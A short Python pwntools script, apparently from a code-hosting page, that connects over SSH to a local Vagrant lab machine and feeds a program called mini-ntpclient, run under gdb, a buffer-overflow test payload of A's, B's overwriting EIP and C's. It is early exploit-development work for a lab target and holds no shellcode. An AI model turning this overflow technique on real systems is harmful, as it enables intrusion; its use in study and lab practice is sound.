26 lines
699 B
Python
26 lines
699 B
Python
from pwn import *
|
|
import base64
|
|
|
|
context.update(arch='i386', os='linux')
|
|
|
|
# Connect to the server with SSH
|
|
ssh_connection = ssh('vagrant', 'default', port=2222)
|
|
|
|
# Open a shell to write more stuff to
|
|
bash = ssh_connection.run('bash')
|
|
|
|
#crash_at = 0x12c
|
|
|
|
crash_at = 264
|
|
eip_crash = 0x61616663
|
|
eip_crash_buffer = cyclic_find(eip_crash)
|
|
|
|
# Create a test payload which writes up to the EIP with A's, writes over the EIP with B's and then writes C's
|
|
payload = 'A' * eip_crash_buffer + ('B' * 4) + ('C' * (crash_at - eip_crash_buffer - 4))
|
|
|
|
# Send the payload
|
|
bash.sendline('gdb /vagrant/mini-ntpclient')
|
|
bash.sendline('run '+ str(payload))
|
|
# Hand an interactive shell back to the user
|
|
bash.interactive()
|